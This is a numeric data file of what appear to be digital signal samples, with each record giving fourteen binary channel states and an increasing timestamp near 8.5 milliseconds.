0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4456920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4457160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4457440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4457720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4457960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4458200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4458440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4458680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4458920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4459160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4459440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4459720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4459960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4460200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4460440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4460480e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4460920e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4461200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4461240e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4461440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4461720e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4461960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4462200e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4462440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4462680e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4463200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4463440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4463480e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4463720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4463960e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4464200e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4464440e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4464680e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4464920e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4465160e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4465440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4465480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4465960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4466200e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4466440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4466680e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4466760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4466920e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4467160e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4467720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4467960e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4468200e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4468440e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4468680e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4468920e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4469000e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4469160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4469440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4469720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4469960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4470200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4470440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4470720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4470960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4471160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4471480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4471720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4471960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4472200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4472440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4472720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4472960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4473240e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4473480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4473720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4473960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4474440e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4474720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4474760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4474960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4475240e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4475480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4475720e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4475960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4476200e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4476440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4476720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4476760e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4477240e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4477480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4477720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4477960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4478480e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4478720e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4478760e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4478960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4479240e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4479480e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4479720e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4479960e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4480200e-03 0,0,0,0,1,1,0,0,0,1,0,0,1,0,8.4480440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4480720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4480760e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4481240e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4481480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4481720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4481960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4482200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4482440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4482720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4482960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4483160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4483480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4483720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4483960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4484200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4484440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4484720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4484960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4485160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4485480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4485720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4485960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4486200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4486440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4486720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4486960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4487160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4487480e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4487680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4487960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4488200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4488440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4488680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4488920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4489160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4489440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4489680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4489960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4490200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4490440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4490680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4490920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4491160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4491440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4491680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4491960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4492200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4492440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4492680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4492920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4493160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4493440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4493680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4493960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4494200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4494440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4494680e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4494920e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4495160e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4495440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4495720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4495960e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4496200e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4496440e-03 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4496720e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.4496920e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.4497000e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.5740960e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,8.5743160e-03 1,0,0,0,1,1,0,0,0,1,0,1,0,1,8.5743480e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,8.5743680e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,1,8.5747040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,8.5747320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,8.5747360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,8.5747560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,8.5747800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,8.5748040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,8.5748320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,8.5748560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,1,8.5748840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,1,8.5749040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5749280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5749320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5749560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5749800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5750040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5750320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5750560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5750840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5751040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5751320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5751560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5751800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5751880e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5752320e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5752560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5752640e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5752840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5753080e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5753320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5753560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5753800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5754040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5754120e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5754520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5754800e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,8.5754840e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5754880e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5755040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5755280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5755560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5755800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5756040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5756280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5756520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5756760e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5756840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5757040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5757280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5757360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5757560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5757800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5757840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5758280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5758520e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5758800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5759040e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,8.5759080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5759120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5759280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5759560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5759800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5760040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5760280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5760520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5760600e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5761040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5761320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5761360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5761560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5761800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5762040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5762280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5762360e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5762800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5763040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5763120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5763320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5763560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5763800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5764040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5764280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5764520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5764760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5765040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5765280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5765560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5765800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5766040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5766280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5766520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5766600e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5766760e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5767040e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5767280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5767560e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5767800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5768040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5768120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5768520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5768800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5769040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5769280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5769320e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5769800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5770040e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5770280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5770520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5770600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5770760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5771040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5771280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5771560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5771800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5772040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5772080e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5772520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5772800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5772840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5773040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5773280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5773560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5773800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5774040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5774280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5774520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5774760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5775040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5775280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5775560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5775800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5776040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5776280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5776520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5776760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5777040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5777280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5777560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5777800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5778040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5778280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5778360e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5778800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5779040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5779120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5779320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5779560e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5779800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5780040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5780280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5780520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5780600e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5780760e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5781040e-03 1,0,0,0,1,1,0,0,0,0,0,0,0,0,8.5781080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5781120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5781560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5781800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5782280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5782520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5782800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5783040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5783280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5783560e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5783800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5784040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5784120e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5784280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5784520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5784760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5785040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5785080e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5785560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5785800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5785880e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5786040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5786280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5786520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5786760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5787040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5787280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5787560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5787800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5788040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5788280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5788520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5788760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5789040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5789280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5789560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5789800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5790040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5790280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5790520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5790760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5791040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5791280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5791560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5791800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5791840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5792040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5792280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5792360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5792800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5793040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5793560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5793800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5794040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5794280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5794520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5794760e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5794840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5795040e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5795320e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5795360e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5795560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5795800e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5795840e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5796280e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5796520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5796600e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5796800e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5797040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5797280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5797520e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5797760e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5798040e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5798280e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5798520e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5798560e-03 1,0,0,0,1,1,0,0,0,1,0,0,1,0,8.5799000e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5799240e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5799320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5799520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5799760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5800040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5800280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5800520e-03 